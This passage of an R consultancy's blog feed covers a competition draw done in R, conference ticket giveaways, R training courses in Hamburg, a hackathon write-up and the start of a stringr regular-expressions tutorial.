&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The following code will give you a data frame called &lt;code&gt;q&lt;/code&gt; containing a column for each question contained in the &lt;code&gt;WhyR&lt;/code&gt; questionnaire.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;typeforms &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_all_typeforms&lt;/span&gt;()&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;content
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; typeforms[typeforms&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name &lt;span style="color:#ff7b72;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;WhyR&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;uid&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;q &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_questionnaire&lt;/span&gt;(uid)&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;completed
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, obviously, we can’t give you access to this so I’ve hidden the Jumping Rivers API key. But, given you have your own API key assigned to the variable &lt;code&gt;typeform_api&lt;/code&gt; this code will work (remember to change the questionnaire name!). With that, a bit of {dplyr} and the classic &lt;code&gt;sample()&lt;/code&gt;, we can generate a winner for the competition&lt;/p&gt;
&lt;h2 id="the-winners"&gt;The winners&lt;/h2&gt;
&lt;p&gt;Drum roll please… the winner is…&lt;/p&gt;
&lt;p&gt;Agnieszka Fronczyk!&lt;/p&gt;
&lt;p&gt;Congratulations Agnieszka! We’ll see you in Wroclaw! Commiserations to all our unlucky participants. However, we are sponsoring more data science events to come so keep an eye out here for more competitions!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/why-r-2018-winners/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Competition: WhyR 2018</title><link>https://www.jumpingrivers.com/blog/competition-whyr-2018/</link><pubDate>Tue, 22 May 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/competition-whyr-2018/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/competition-whyr-2018/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/competition-whyr-2018/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/competition-whyr-2018/#the-competition"&gt;The competition&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;It’s competition time! We’re sponsoring Why R? 2018 Conference. The conference runs from the
&lt;em&gt;2-5th of July&lt;/em&gt; in &lt;strong&gt;&lt;em&gt;Wroclaw, Poland&lt;/em&gt;&lt;/strong&gt; and us nice folks here at &lt;a href="https://www.jumpingrivers.com" rel="external"&gt;Jumping Rivers&lt;/a&gt; are giving away a free ticket to the conference!&lt;/p&gt;
&lt;h2 id="the-competition"&gt;The competition&lt;/h2&gt;
&lt;p&gt;To enter your name into the prize draw all you have to do is follow one step: Step 1) Fill out this questionnaire (now closed). That’s it! Don’t worry, there are no intrusive personal questions. The winner will be decided by drawing one entrant at random. The closing time for entries is midnight on the 2nd June (we’ll take the most extreme time zone). That’s all, cheers!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/competition-whyr-2018/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Courses in Hamburg</title><link>https://www.jumpingrivers.com/blog/r-courses-in-hamburg/</link><pubDate>Wed, 09 May 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-courses-in-hamburg/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-courses-in-hamburg/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-courses-in-hamburg/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Big news, from the 13th till the 27th June Jumping Rivers will be running 6 courses on R in &lt;em&gt;&lt;strong&gt;Hamburg!!&lt;/strong&gt;&lt;/em&gt;. It should be noted that each course runs for one day, apart from the &lt;em&gt;Predictive Analytics&lt;/em&gt; course, which runs for 2 days. The courses are as follows:&lt;/p&gt;
&lt;h2 id="introduction-to-r---13th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/"&gt;Introduction to R - 13th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;For this course, you need &lt;em&gt;no&lt;/em&gt; prior programming knowledge of any type! You will learn how to efficiently manipulate, plot, import and export data using R.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-r-courses-in-hamburg"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="mastering-the-tidyverse---14th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/introduction-r-tidyverse/"&gt;Mastering the Tidyverse - 14th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;A course on the suite of R packages known as the {tidyverse}. The {tidyverse} is essential for any statistician or data scientist who deals with data on a day-to-day basis. By focusing on small key tasks, the tidyverse suite of packages removes the pain of data manipulation. You will learn how to use packages at the forefront of cutting-edge data analytics such as {dplyr} and {tidyr}. Learn how to efficiently manage dates and times with {lubridate} and learn how to import and export data from anything from csv and excel files to SAS and SPSS files using the fantastic {readr}, {readxl} and {foreign} packages.&lt;/p&gt;
&lt;h2 id="next-steps-in-the-tidyverse---15th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-tidyverse-purrr-broom/"&gt;Next Steps in the Tidyverse - 15th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;After mastering only half the potential of the tidyverse in &lt;strong&gt;Mastering the Tidyverse&lt;/strong&gt;, this course will cover other {tidyverse} essentials. Tired of writing &lt;em&gt;for&lt;/em&gt; loops? Look no further, the {purrr} package provides a complete and consistent set of tools for working with functions and vectors. Learn how to use {stringr}, regular expressions and {tidytext}, providing you with the tools for complex string and text analysis.&lt;/p&gt;
&lt;h2 id="automated-reporting-first-steps-towards-shiny---20th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/automated-reporting-first-steps-towards-shiny/"&gt;Automated Reporting (First Steps Towards Shiny) - 20th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Tired of having to write a new report for every single data set? With &lt;strong&gt;R Markdown&lt;/strong&gt;, and {knitr} you can build interactive reports, documents and dashboards that update when your data updates!&lt;/p&gt;
&lt;h2 id="interactive-graphics-with-shiny---21st"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/"&gt;Interactive Graphics with Shiny - 21st&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The R package {shiny} allows you to create cutting-edge, interactive web graphics and applications that react to your data in a new and innovative way. Not only that, but {shiny} provides a platform where you can host your web applications for free!&lt;/p&gt;
&lt;h2 id="predictive-analytics---2728th"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-predictive-analytics-machine-learning/"&gt;Predictive Analytics - 27/28th&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;You will learn about popular analytical techniques practised in industry today such as simple regression, clustering, discriminant analysis, random forests, splines and many more. Of course, by the end of the day, you will be able to use R to apply these methods to your data, often in &lt;em&gt;one line&lt;/em&gt; of code! For any more info, drop us a visit at &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;jumpingrivers.com&lt;/a&gt; or feel free to give me an email at &lt;em&gt;&lt;a href="mailto:theo@jumpingrivers.com" rel="external"&gt;theo@jumpingrivers.com&lt;/a&gt;&lt;/em&gt; Cheers!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-courses-in-hamburg/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>eRum Competition Winners</title><link>https://www.jumpingrivers.com/blog/erum-competition-winners/</link><pubDate>Fri, 20 Apr 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/erum-competition-winners/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/erum-competition-winners/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/erum-competition-winners/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/erum-competition-winners/#the-main-competition"&gt;The Main Competition&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/erum-competition-winners/#the-secondary-competition"&gt;The Secondary Competition&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/erum-competition-winners/#what-next"&gt;What next?&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The results of the eRum &lt;a href="https://www.jumpingrivers.com/blog/free-ticket-to-erum/"&gt;competition&lt;/a&gt; are in! Before we announce the winners we would like to thank everyone who entered. It has been a pleasure to look at all of the ideas on show.&lt;/p&gt;
&lt;h3 id="the-main-competition"&gt;The Main Competition&lt;/h3&gt;
&lt;p&gt;The winner of the main competition is Lukasz Janiszewski. Lukasz provided a fantastic visualisation of the locations of each R user/ladies group and all R conferences. You can see his application &lt;a href="https://ch2m.shinyapps.io/erum_jr/" rel="external"&gt;here&lt;/a&gt;. If you want to view his code, you are able to do so in this &lt;a href="https://github.com/lukuiR/Rpublic" rel="external"&gt;GitHub repo&lt;/a&gt;. The code is contained in the directory erum_jr and the data preparation can be seen in &lt;code&gt;budap.R&lt;/code&gt;. Lukasz made 3 csv files contained the information about the R user, R ladies and R conferences. Using the help of &lt;a href="https://www.r-bloggers.com/osm-nominatim-with-r-getting-locations-geo-coordinates-by-its-address/" rel="external"&gt;an Rbloggers post&lt;/a&gt;, he was able to add the geospatial information to those csv files. Finally, he scraped each meetup page for information on the R-ladies groups. Using all of this information, he was able to make an informative, visually appealing dashboard with {shiny}. Lukasz will now be jetting off to Budapest, to eRum 2018!&lt;/p&gt;
&lt;h3 id="the-secondary-competition"&gt;The Secondary Competition&lt;/h3&gt;
&lt;p&gt;The winner of the secondary competition is Jenny Snape. Jenny provided an excellent script to parse the current .Rmd files and extract the conference and group urls &amp;amp; locations. The script can be found in this &lt;a href="https://gist.github.com/jumpingrivers/a05f8ae598747be49679b0b75790f2e2" rel="external"&gt;GitHub gist&lt;/a&gt;. Jenny has written a few words to summarise her script… “The files on github can be read into R as character vectors (where each line is an element of the vector) using the R &lt;code&gt;readLines()&lt;/code&gt; function. From this character vector, we need to extract the country, the group name and url. This can be done by recognising that each line containing a country starts with a ‘##’ and each line containing the group name and url starts with a ’*‘. Therefore we can use these ’tags’ to cycle through each element of the character vector and pull out vectors containing the countries, the cities and the urls of the R groups. These vectors can then be cleaned and joined together into a data frame. I wrote these steps into a function that accepted each R group character vector as an input and returned the final data frame. As one of the data sets contained just R Ladies groups, I fed this in as an argument and returned it as a column in the final data frame in order to differentiate between the different group types. I also returned a variable based on the character vector input in order to differentiate between the different world continents. Running this function on each of the character vectors creates separate data sets which can then be all joined together. This creates a final dataset containing all the information on each R group: the type of group, the url, the city and the region.&amp;quot;&lt;/p&gt;
&lt;p&gt;As well as this, Jenny provided us with a fantastic &lt;a href="https://jennifersnape.shinyapps.io/leaflet_app/" rel="external"&gt;{shiny} dashboard&lt;/a&gt;, summarising the data. Jenny has now received a free copy of &lt;a href="http://shop.oreilly.com/?cmp=af-npa--storehome_cj_11257098_4003003" rel="external"&gt;Efficient R Programming&lt;/a&gt;! Once again, thank you to all who entered and well done to our winners, Lukasz and Jenny!&lt;/p&gt;
&lt;h3 id="what-next"&gt;What next?&lt;/h3&gt;
&lt;p&gt;We’re in the process of converting Jenny’s &amp;amp; Lukasz’s hard work into a nice dashboard that will be magically updated via our list of &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;useR groups&lt;/a&gt; and conferences. It should be ready in a few days.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/erum-competition-winners/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>The Water Hub Hackathon; We won!</title><link>https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/</link><pubDate>Fri, 20 Apr 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Well well well, we’ve only gone and won The Water Hub hackathon! Well, joint winners but the main word is &lt;em&gt;WINNER&lt;/em&gt;. First of all we want to say thank you to all the guys at the &lt;a href="http://www.thewaterhub.org.uk/" rel="external"&gt;Water Hub&lt;/a&gt; and the Sunderland Software Centre for organising and inviting. There was some tough competition there and we are thrilled to have been ajudged joint top! Here’s how we won:&lt;/p&gt;
&lt;p&gt;The first day started off with presentations from Antonia Scarr and Matt Starr from the enviroment agency (who we apologise profusely to for constantly harassing about their current system and data), Martin Colling from the Wear Rivers Trust and Louise Bracken of The Water Hub. Whilst we were listening to some passionate presentations about the enviroment and the problem at hand we were able to tuck into some free bacon and sausage sarnies!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2018-the-water-hub-hackathon-we-won"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The main problems we thought the presentations established were:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The Enviroment Agency have created a fantastic data exploration tool with a &lt;strong&gt;&lt;em&gt;TONNE&lt;/em&gt;&lt;/strong&gt; of data available in it &lt;em&gt;but&lt;/em&gt; it’s a little difficult to navigate and the API documentation is difficult. The data exploration tool along with all the data is available to view &lt;a href="http://environment.data.gov.uk/catchment-planning/" rel="external"&gt;here&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;To help the enviroment, we need to engage a wide audience and encourage people to use the available data &lt;em&gt;but&lt;/em&gt; because of the difficult/scary data exploration tool it is not easy to do so.&lt;/li&gt;
&lt;li&gt;No way for current users of the data who want to share their insight to integrate with the existing tool directly&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We then established a few criteria our app should meet based on these presentations and a few chats with people around the room:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Ability to subscribe to data updates&lt;/li&gt;
&lt;li&gt;Better visualisation tools&lt;/li&gt;
&lt;li&gt;Ability to look at multiple regions at once&lt;/li&gt;
&lt;li&gt;Improve user experience with reduced page load times&lt;/li&gt;
&lt;li&gt;Modularity&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So we came up with a product to tackle these problems. In reality it’s a collection of more focused products that sit together through a single web application. The bonus of this is that if we then develop more tools they will just slot into the app without us having to completely redesign the whole thing.&lt;/p&gt;
&lt;p&gt;With this being a hackathon and having less than 24 hours to design, build, re-design, and re-build our final application this modularity allowed each of us to work on fairly independents components without worrying about breaking the others’ code.&lt;/p&gt;
&lt;p&gt;The three products that make up the app are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A map giving you the ability to chose more than one area for evaluation&lt;/li&gt;
&lt;li&gt;A simpler more consistent and visually appealing documentation for the API (This was actually added as we went along as we found the existing one to be a bit unfriendly)
&lt;ul&gt;
&lt;li&gt;The ability to explore the API in a more visual way&lt;/li&gt;
&lt;li&gt;The ability to generate Example API queries in the page - (could copy and paste out to your application)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A bespoke reporting tool
&lt;ul&gt;
&lt;li&gt;This included dynamic html based reports generated from regions and data sets of interest in the explorer&lt;/li&gt;
&lt;li&gt;The ability to print these reports straight to pdf file (I still can’t believe you were copying tables and graphs over by hand.)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Here’s a cheeky picture of us being winners:&lt;/p&gt;
&lt;img class="image-center" src="hack3.jpg" style="width:500px; class:image-center"&gt;
&lt;p&gt;Quick demos of the ‘final’ product:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=SFkJDKSfSO0&amp;t=8s" rel="external"&gt;A walk through of the app and it’s help modes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=YWYO3PpYTBw" rel="external"&gt;A walk through of the API page&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=TeggfVD1qno&amp;t=11s" rel="external"&gt;A walk through of the map and report generator pages&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.youtube.com/watch?v=KR7CMV4MNq0" rel="external"&gt;A walk through of the voice command feature&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;h4 id="and-a-few-of-the-more-technical-details"&gt;And a few of the more technical details:&lt;/h4&gt;
&lt;p&gt;To begin with we chose some technologies well-suited to, or designed for, implementing paramaterised reporting, statistical analysis, and interactive data exploration. For us this was &lt;strong&gt;R&lt;/strong&gt; with &lt;em&gt;RStudio&lt;/em&gt;, &lt;em&gt;Shiny&lt;/em&gt;, and &lt;em&gt;Rmarkdown&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;RStudio allowed us to each grab bits of the catchment planning data from their APIs and explore the consistency, coverage, and general structure. Together we discovered that (1) understanding the API and data structures can initially be hard, and (2) a few small tweaks could make the experience much better for ourselves and for others who would access this data in the future. The quality of the data (once understood) was very good and would provide us plenty to work with.&lt;/p&gt;
&lt;p&gt;The first tweak was to redescribe the API with the &lt;a href="https://swagger.io/specification/" rel="external"&gt;OpenAPI Specification&lt;/a&gt;, by providing a representation of the endpoints that was both human and machine readable we could quickly generate an interactive version of the API. This allows both navigation through the data structures and also provides real-time previews of the requests required to fetch any data &lt;em&gt;and&lt;/em&gt; results from those requests.&lt;/p&gt;
&lt;p&gt;We liked the concept of navigation through the catchment planning data via maps, but the experience could be smoother. The existing navigation tool requires selecting one of many regions on a zoomable map, and then leaving that page to see a new map where you could further select smaller regions. The necessity to reload the entire page and display a new map can hinder the user experience if the users are not already familiar with these areas. We proposed to re-use the same map while refining the region selection process, reducing page navigation and context switching.&lt;/p&gt;
&lt;p&gt;A second result of the existing design was that the refinement process is strictly hierarchical. If you wish to examine data from two neighbouring &lt;em&gt;water bodies&lt;/em&gt; (the smallest region type) you may have to navigate back to the very first page if they happen to fall across two different &lt;em&gt;river basin districts&lt;/em&gt; (the largest region type), or similar across &lt;em&gt;management catchments&lt;/em&gt; and &lt;em&gt;operational catchments&lt;/em&gt;. Using a single map view would allow us to easily select multiple water bodies from within any parent areas. To build this interface we created a Shiny app with the Leaflet.js plugin and a little bit of customisation.&lt;/p&gt;
&lt;p&gt;Finally, the reporting tools that existing users would expect from the current website were to be reproduced, but now with more control over the bodies included in each summary. Once again, Shiny and R allowed us to gather all the required data from the environment agency’s APIs and generate a few of the summary tables and graphics as a proof of concept. Additionally, using Shiny we could further filter the data displayed.&lt;/p&gt;
&lt;p&gt;These two shiny apps and the interactive API run independently and are brought together by the final web UI.&lt;/p&gt;
&lt;p&gt;Final report documents can be generated from the interactive report Shiny app as it is written using R Markdown, an interpreted markup language allowing reproducibility and configurability of documents in a variety of output formats including PDF.&lt;/p&gt;
&lt;p&gt;We kept our code in a single git repository during development and described the requirements to run each component with a &lt;em&gt;Dockerfile&lt;/em&gt;. The Dockerfile actually describes everything requried to build an environment within which the application will run, from the operating system, to the packages, any additional software, services, and configurations, and finally the application itself. A &lt;code&gt;docker-compose.yml&lt;/code&gt; file describes the relationships between our three main services allowing them to communicate with each other and the users.&lt;/p&gt;
&lt;p&gt;Of course, our presentation pitch was also produced with &lt;em&gt;R Markdown&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;We’ll be writing more about our containerised workflows in a future blog post.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/the-water-hub-hackathon-we-won/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Regular Expressions Every R programmer Should Know</title><link>https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/</link><pubDate>Thu, 12 Apr 2018 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/regular-expressions-every-r-programmer-should-know/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Regular expressions. How they can be cruel! Well we&amp;rsquo;re here to make them a tad easier. To do so we&amp;rsquo;re going to make use of the {stringr} package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;stringr&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We&amp;rsquo;re going to use the &lt;code&gt;str_detect()&lt;/code&gt; and &lt;code&gt;str_subset()&lt;/code&gt; functions. In particular the latter. These have the syntax&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;function_name&lt;/span&gt;(STRING, REGEX_PATTERN)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;str_detect()&lt;/code&gt; is used to detect whether a string contains a certain pattern. At the most basic use of these functions, we can match strings of text. For instance&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;jr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Theo is first&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Esther is second&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Colin - third&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_detect&lt;/span&gt;(jr, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Theo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE FALSE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_detect&lt;/span&gt;(jr, &lt;span style="color:#a5d6ff"&gt;&amp;#34;is&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] TRUE TRUE FALSE&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;So &lt;code&gt;str_detect()&lt;/code&gt; will return &lt;code&gt;TRUE&lt;/code&gt; when the element contains the pattern we searched for. If we want to return the actual strings that contain these patterns, we use &lt;code&gt;str_subset()&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(jr, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Theo&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Theo is first&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_subset&lt;/span&gt;(jr, &lt;span style="color:#a5d6ff"&gt;&amp;#34;is&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;Theo is first&amp;#34; &amp;#34;Esther is second&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To practise our regex, we&amp;rsquo;ll need some text to practise on. Here we have a vector of filenames called &lt;code&gt;files&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;files &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;tmp-project.csv&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;project.csv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;project2-csv-specs.csv&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;project2.csv2.specs.xlsx&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;project_cars.ods&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;project-houses.csv&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Project_Trees.csv&amp;#34;&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;&amp;#34;project-cars.R&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;project-houses.r&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;project-final.xls&amp;#34;&lt;/span&gt;,
